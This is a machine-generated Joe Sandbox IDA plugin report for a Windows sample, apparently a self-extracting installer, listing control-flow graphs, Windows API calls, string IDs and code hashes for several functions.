                                                                                                                                    control_flow_graph 348 37c73f-37c757 call 37eb78 call 37ec50 353 37d40d-37d418 348->353 354 37c75d-37c787 call 37b314 348->354 354->353 357 37c78d-37c792 354->357 358 37c793-37c7a1 357->358 359 37c7a2-37c7b7 call 37af98 358->359 362 37c7b9 359->362 363 37c7bb-37c7d0 call 371fbb 362->363 366 37c7d2-37c7d6 363->366 367 37c7dd-37c7e0 363->367 366->363 368 37c7d8 366->368 369 37c7e6 367->369 370 37d3d9-37d404 call 37b314 367->370 368->370 372 37ca5f-37ca61 369->372 373 37c9be-37c9c0 369->373 374 37c7ed-37c7f0 369->374 375 37ca7c-37ca7e 369->375 370->358 381 37d40a-37d40c 370->381 372->370 376 37ca67-37ca77 SetWindowTextW 372->376 373->370 379 37c9c6-37c9d2 373->379 374->370 380 37c7f6-37c850 call 37a64d call 36bdf3 call 36a544 call 36a67e call 366edb 374->380 375->370 378 37ca84-37ca8b 375->378 376->370 378->370 382 37ca91-37caaa 378->382 383 37c9e6-37c9eb 379->383 384 37c9d4-37c9e5 call 387686 379->384 436 37c98f-37c9a4 call 36a5d1 380->436 381->353 386 37cab2-37cac0 call 383e13 382->386 387 37caac 382->387 390 37c9f5-37ca00 call 37b48e 383->390 391 37c9ed-37c9f3 383->391 384->383 386->370 405 37cac6-37cacf 386->405 387->386 392 37ca05-37ca07 390->392 391->392 398 37ca12-37ca32 call 383e13 call 383e3e 392->398 399 37ca09-37ca10 call 383e13 392->399 425 37ca34-37ca3b 398->425 426 37ca4b-37ca4d 398->426 399->398 409 37cad1-37cad5 405->409 410 37caf8-37cafb 405->410 411 37cad7-37cadf 409->411 412 37cb01-37cb04 409->412 410->412 414 37cbe0-37cbee call 370602 410->414 411->370 417 37cae5-37caf3 call 370602 411->417 419 37cb06-37cb0b 412->419 420 37cb11-37cb2c 412->420 427 37cbf0-37cc04 call 38279b 414->427 417->427 419->414 419->420 437 37cb76-37cb7d 420->437 438 37cb2e-37cb68 420->438 432 37ca42-37ca4a call 387686 425->432 433 37ca3d-37ca3f 425->433 426->370 428 37ca53-37ca5a call 383e2e 426->428 447 37cc06-37cc0a 427->447 448 37cc11-37cc62 call 370602 call 37b1be GetDlgItem SetWindowTextW SendMessageW call 383e49 427->448 428->370 432->426 433->432 454 37c855-37c869 SetFileAttributesW 436->454 455 37c9aa-37c9b9 call 36a55a 436->455 441 37cb7f-37cb97 call 383e13 437->441 442 37cbab-37cbce call 383e13 * 2 437->442 471 37cb6c-37cb6e 438->471 472 37cb6a 438->472 441->442 458 37cb99-37cba6 call 3705da 441->458 442->427 476 37cbd0-37cbde call 3705da 442->476 447->448 453 37cc0c-37cc0e 447->453 482 37cc67-37cc6b 448->482 453->448 459 37c90f-37c91f GetFileAttributesW 454->459 460 37c86f-37c8a2 call 36b991 call 36b690 call 383e13 454->460 455->370 458->442 459->436 469 37c921-37c930 DeleteFileW 459->469 492 37c8b5-37c8c3 call 36bdb4 460->492 493 37c8a4-37c8b3 call 383e13 460->493 469->436 475 37c932-37c935 469->475 471->437 472->471 479 37c939-37c965 call 364092 GetFileAttributesW 475->479 476->427 488 37c937-37c938 479->488 489 37c967-37c97d MoveFileW 479->489 482->370 487 37cc71-37cc85 SendMessageW 482->487 487->370 488->479 489->436 491 37c97f-37c989 MoveFileExW 489->491 491->436 492->455 498 37c8c9-37c908 call 383e13 call 37fff0 492->498 493->492 493->498 498->459
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0037C744
                                                                                                                                      • Part of subcall function 0037B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037B3FB
                                                                                                                                      • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                                                                    • _wcslen.LIBCMT ref: 0037CA0A
                                                                                                                                    • _wcslen.LIBCMT ref: 0037CA13
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0037CA71
                                                                                                                                    • _wcslen.LIBCMT ref: 0037CAB3
                                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0037CBFB
                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0037CC36
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0037CC46
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,003AA472), ref: 0037CC54
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0037CC7F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                                    • String ID: %s.%d.tmp$<br>$<7$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$7
                                                                                                                                    • API String ID: 986293930-2680291851
                                                                                                                                    • Opcode ID: abecaf949f1915793284111f605d35125387cfa60225da1e870a93861d4f2ef3
                                                                                                                                    • Instruction ID: c8bae630bd7cc2a5b7f97840332e7ff8bb714ff0143c9695bd5b3b8303ffc228
                                                                                                                                    • Opcode Fuzzy Hash: abecaf949f1915793284111f605d35125387cfa60225da1e870a93861d4f2ef3
                                                                                                                                    • Instruction Fuzzy Hash: 62E146B2900219AADF36EB60DC85DEE73BCAF05350F44C1A5F609E7140EB789E848F60
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0036DA70
                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0036DA91
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0036DAAC
                                                                                                                                      • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                                                                      • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                                                                      • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010474), ref: 00371BA0
                                                                                                                                    • _wcslen.LIBCMT ref: 0036DDE9
                                                                                                                                    • __fprintf_l.LIBCMT ref: 0036DF1C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$99
                                                                                                                                    • API String ID: 557298264-3818710046
                                                                                                                                    • Opcode ID: 66f0892aa895b7508efb99376651a19121bb403ea818b294f154883563c23db6
                                                                                                                                    • Instruction ID: 740e63650c5e68a25e7510583f216b97cfab7d427b468bd1972a575eb395a858
                                                                                                                                    • Opcode Fuzzy Hash: 66f0892aa895b7508efb99376651a19121bb403ea818b294f154883563c23db6
                                                                                                                                    • Instruction Fuzzy Hash: 1032F376A00218DBCF26EF68C845BEE77A9FF05700F41855AF9059B289E7B1DD88CB50

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                                                                      • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                                                                      • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
                                                                                                                                      • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                                                                      • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                                                                    • GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                    • String ID: \
                                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                                    • Opcode ID: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
                                                                                                                                    • Instruction ID: 099adf2ea29e5a0841600d0b5a2fe3a2e8cb6dfdb54ec42dc0578a78322406b9
                                                                                                                                    • Opcode Fuzzy Hash: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
                                                                                                                                    • Instruction Fuzzy Hash: 1031D172145352AFE312EF20DC4AFAB7FACEB8A758F008518F552D6190DB64AA048776

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 838 37d78f-37d7a7 call 37ec50 841 37d7ad-37d7b9 call 383e13 838->841 842 37d9e8-37d9f0 838->842 841->842 845 37d7bf-37d7e7 call 37fff0 841->845 848 37d7f1-37d7ff 845->848 849 37d7e9 845->849 850 37d812-37d818 848->850 851 37d801-37d804 848->851 849->848 853 37d85b-37d85e 850->853 852 37d808-37d80e 851->852 855 37d837-37d844 852->855 856 37d810 852->856 853->852 854 37d860-37d866 853->854 857 37d86d-37d86f 854->857 858 37d868-37d86b 854->858 860 37d9c0-37d9c2 855->860 861 37d84a-37d84e 855->861 859 37d822-37d82c 856->859 863 37d882-37d898 call 36b92d 857->863 864 37d871-37d878 857->864 858->857 858->863 865 37d82e 859->865 866 37d81a-37d820 859->866 862 37d9c6 860->862 861->862 867 37d854-37d859 861->867 871 37d9cf 862->871 874 37d8b1-37d8bc call 36a231 863->874 875 37d89a-37d8a7 call 371fbb 863->875 864->863 868 37d87a 864->868 865->855 866->859 870 37d830-37d833 866->870 867->853 868->863 870->855 873 37d9d6-37d9d8 871->873 876 37d9e7 873->876 877 37d9da-37d9dc 873->877 883 37d8be-37d8d5 call 36b6c4 874->883 884 37d8d9-37d8dd 874->884 875->874 885 37d8a9 875->885 876->842 877->876 880 37d9de-37d9e1 ShowWindow 877->880 880->876 883->884 888 37d8e4-37d8e6 884->888 885->874 888->876 889 37d8ec-37d8f9 888->889 890 37d90c-37d90e 889->890 891 37d8fb-37d902 889->891 893 37d925-37d944 call 37dc3b 890->893 894 37d910-37d919 890->894 891->890 892 37d904-37d90a 891->892 892->890 895 37d97b-37d987 CloseHandle 892->895 893->895 907 37d946-37d94e 893->907 894->893 903 37d91b-37d923 ShowWindow 894->903 897 37d989-37d996 call 371fbb 895->897 898 37d998-37d9a6 895->898 897->871 897->898 898->873 902 37d9a8-37d9aa 898->902 902->873 906 37d9ac-37d9b2 902->906 903->893 906->873 908 37d9b4-37d9be 906->908 907->895 909 37d950-37d961 GetExitCodeProcess 907->909 908->873 909->895 910 37d963-37d96d 909->910 911 37d974 910->911 912 37d96f 910->912 911->895 912->911
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 0037D7AE
                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0037D8DE
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0037D91D
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0037D959
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0037D97F
                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0037D9E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                    • String ID: .exe$.inf$PDu<7$h7$r7
                                                                                                                                    • API String ID: 36480843-3959991556
                                                                                                                                    • Opcode ID: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                                                                    • Instruction ID: 2a53ffed54ae0b84d71a8fb339aa674a5297f230fa86ac6a62655841f189c8c6
                                                                                                                                    • Opcode Fuzzy Hash: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                                                                    • Instruction Fuzzy Hash: 8951D471104380AADB339B24D844BABBBF8AF86744F05841EF6C997291E7799984CB52

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 913 38a95b-38a974 914 38a98a-38a98f 913->914 915 38a976-38a986 call 38ef4c 913->915 917 38a99c-38a9c0 MultiByteToWideChar 914->917 918 38a991-38a999 914->918 915->914 922 38a988 915->922 920 38ab53-38ab66 call 37fbbc 917->920 921 38a9c6-38a9d2 917->921 918->917 923 38a9d4-38a9e5 921->923 924 38aa26 921->924 922->914 927 38aa04-38aa15 call 388e06 923->927 928 38a9e7-38a9f6 call 392010 923->928 926 38aa28-38aa2a 924->926 930 38ab48 926->930 931 38aa30-38aa43 MultiByteToWideChar 926->931 927->930 941 38aa1b 927->941 928->930 940 38a9fc-38aa02 928->940 935 38ab4a-38ab51 call 38abc3 930->935 931->930 934 38aa49-38aa5b call 38af6c 931->934 943 38aa60-38aa64 934->943 935->920 942 38aa21-38aa24 940->942 941->942 942->926 943->930 945 38aa6a-38aa71 943->945 946 38aaab-38aab7 945->946 947 38aa73-38aa78 945->947 949 38aab9-38aaca 946->949 950 38ab03 946->950 947->935 948 38aa7e-38aa80 947->948 948->930 953 38aa86-38aaa0 call 38af6c 948->953 951 38aacc-38aadb call 392010 949->951 952 38aae5-38aaf6 call 388e06 949->952 954 38ab05-38ab07 950->954 959 38ab41-38ab47 call 38abc3 951->959 965 38aadd-38aae3 951->965 952->959 967 38aaf8 952->967 953->935 968 38aaa6 953->968 958 38ab09-38ab22 call 38af6c 954->958 954->959 958->959 971 38ab24-38ab2b 958->971 959->930 970 38aafe-38ab01 965->970 967->970 968->930 970->954 972 38ab2d-38ab2e 971->972 973 38ab67-38ab6d 971->973 974 38ab2f-38ab3f WideCharToMultiByte 972->974 973->974 974->959 975 38ab6f-38ab76 call 38abc3 974->975 975->935
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00385695,00385695,?,?,?,0038ABAC,00000001,00000001,2DE85006), ref: 0038A9B5
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0038AA3B
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038AB35
                                                                                                                                    • __freea.LIBCMT ref: 0038AB42
                                                                                                                                      • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38
                                                                                                                                    • __freea.LIBCMT ref: 0038AB4B
                                                                                                                                    • __freea.LIBCMT ref: 0038AB70
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                    • Opcode ID: 8e06e154b50b4a56303e5e32c9d4fef58062314c8b22935606304d214a1cbdc0
                                                                                                                                    • Instruction ID: 80b8e0f9efdbba632a690e0be620f6973ff0bc4b403824fe2c8b463968dff077
                                                                                                                                    • Opcode Fuzzy Hash: 8e06e154b50b4a56303e5e32c9d4fef58062314c8b22935606304d214a1cbdc0
                                                                                                                                    • Instruction Fuzzy Hash: 2051E372600B16ABFB27AF64CC41EBBB7AAEB40710F1646AAFD04DA140DB34DD50D791

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 978 383b72-383b7c 979 383bee-383bf1 978->979 980 383b7e-383b8c 979->980 981 383bf3 979->981 983 383b8e-383b91 980->983 984 383b95-383bb1 LoadLibraryExW 980->984 982 383bf5-383bf9 981->982 985 383c09-383c0b 983->985 986 383b93 983->986 987 383bfa-383c00 984->987 988 383bb3-383bbc GetLastError 984->988 985->982 990 383beb 986->990 987->985 989 383c02-383c03 FreeLibrary 987->989 991 383bbe-383bd3 call 386088 988->991 992 383be6-383be9 988->992 989->985 990->979 991->992 995 383bd5-383be4 LoadLibraryExW 991->995 992->990 995->987 995->992
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00383C35,?,?,003C2088,00000000,?,00383D60,00000004,InitializeCriticalSectionEx,00396394,InitializeCriticalSectionEx,00000000), ref: 00383C03
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                    • String ID: api-ms-
                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                    • Opcode ID: 88115c2b6805f261531fcdb4143133ce2dee6e29b937cf4f8d7655c012f98021
                                                                                                                                    • Instruction ID: 3d1df055f88694fcf842c7aee3e450bad10a4096b04ce67b0273ae878f51e7ba
                                                                                                                                    • Opcode Fuzzy Hash: 88115c2b6805f261531fcdb4143133ce2dee6e29b937cf4f8d7655c012f98021
                                                                                                                                    • Instruction Fuzzy Hash: 5511CAB5A46321ABCF23AB689C41B9937689F01B70F1601A1E955FB390E771EF0087D1

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                                                                      • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                                                                    • SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                                    • Opcode ID: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                                                                    • Instruction ID: db1a4af10e01ae9713f566a3de35d433c9a3e15537922988a7885103ea9e13db
                                                                                                                                    • Opcode Fuzzy Hash: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                                                                    • Instruction Fuzzy Hash: 3AF01DB5D00219ABCB11AFAAD849DEFFFFCEF85700F00815AE415E2241DBB856058FA1

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1000 3698e0-369901 call 37ec50 1003 369903-369906 1000->1003 1004 36990c 1000->1004 1003->1004 1006 369908-36990a 1003->1006 1005 36990e-36991f 1004->1005 1007 369927-369931 1005->1007 1008 369921 1005->1008 1006->1005 1009 369936-369943 call 366edb 1007->1009 1010 369933 1007->1010 1008->1007 1013 369945 1009->1013 1014 36994b-36996a CreateFileW 1009->1014 1010->1009 1013->1014 1015 36996c-36998e GetLastError call 36bb03 1014->1015 1016 3699bb-3699bf 1014->1016 1019 3699c8-3699cd 1015->1019 1025 369990-3699b3 CreateFileW GetLastError 1015->1025 1018 3699c3-3699c6 1016->1018 1018->1019 1020 3699d9-3699de 1018->1020 1019->1020 1022 3699cf 1019->1022 1023 3699e0-3699e3 1020->1023 1024 3699ff-369a10 1020->1024 1022->1020 1023->1024 1026 3699e5-3699f9 SetFileTime 1023->1026 1027 369a12-369a2a call 370602 1024->1027 1028 369a2e-369a39 1024->1028 1025->1018 1029 3699b5-3699b9 1025->1029 1026->1024 1027->1028 1029->1018
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00367760,?,00000005,?,00000011), ref: 0036995F
                                                                                                                                    • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036996C
                                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00367760,?,00000005,?), ref: 003699A2
                                                                                                                                    • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699AA
                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
